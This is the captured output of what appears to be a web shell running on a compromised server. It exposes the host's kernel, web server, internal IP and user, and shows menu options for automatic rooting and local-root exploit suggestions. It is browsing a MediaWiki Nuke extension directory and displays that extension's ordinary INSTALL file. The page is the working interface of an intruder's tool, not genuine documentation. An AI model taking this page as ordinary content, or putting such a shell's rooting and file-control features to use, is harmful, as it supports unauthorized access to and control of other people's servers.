Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
wiki.bernardino.org /
extensions /
Nuke /
Delete
Unzip
Name
Size
Permission
Date
Action
docs
[ DIR ]
drwxr-xr-x
2016-11-28 20:21
i18n
[ DIR ]
drwxr-xr-x
2016-11-28 20:21
COPYING
17.67
KB
-rw-r--r--
2016-11-28 20:21
Gruntfile.js
573
B
-rw-r--r--
2016-11-28 20:21
INSTALL
1008
B
-rw-r--r--
2016-11-28 20:21
Nuke.alias.php
6.74
KB
-rw-r--r--
2016-11-28 20:21
Nuke.hooks.php
643
B
-rw-r--r--
2016-11-28 20:21
Nuke.i18n.php
121.73
KB
-rw-r--r--
2011-07-17 21:50
Nuke.php
554
B
-rw-r--r--
2016-11-28 20:21
Nuke_body.php
10.19
KB
-rw-r--r--
2016-11-28 20:21
README
622
B
-rw-r--r--
2016-11-28 20:21
RELEASE-NOTES
1.79
KB
-rw-r--r--
2016-11-28 20:21
SpecialNuke.php
42
B
-rw-r--r--
2016-11-28 20:21
composer.json
225
B
-rw-r--r--
2016-11-28 20:21
ext.nuke.js
713
B
-rw-r--r--
2016-11-28 20:21
extension.json
866
B
-rw-r--r--
2016-11-28 20:21
phpcs.xml
250
B
-rw-r--r--
2016-11-28 20:21
Save
Rename
These is the install file for the Nuke extension. Extension page on mediawiki.org: https://www.mediawiki.org/wiki/Extension:Nuke Latest version of the install file: https://gerrit.wikimedia.org/r/gitweb?p=mediawiki/extensions/Nuke.git;a=blob;f=INSTALL == Requirements == Nuke requires: * MediaWiki 1.18 or above == Download == You can get the code directly from Git. git clone https://gerrit.wikimedia.org/r/p/mediawiki/extensions/Nuke.git Old tags can be obtained via SVN: svn checkout http://svn.wikimedia.org/svnroot/mediawiki/tags/extensions/Nuke/REL_version Where 'version' is the version number of the tag, such as 0_1 (see the available tags at http://svn.wikimedia.org/svnroot/mediawiki/tags/extensions/Nuke/). == Installation == Once you have downloaded the code, place the ''Nuke'' directory within your MediaWiki 'extensions' directory. Then add the following code to your [[Manual:LocalSettings.php|LocalSettings.php]] file: # Nuke require_once( "$IP/extensions/Nuke/Nuke.php" );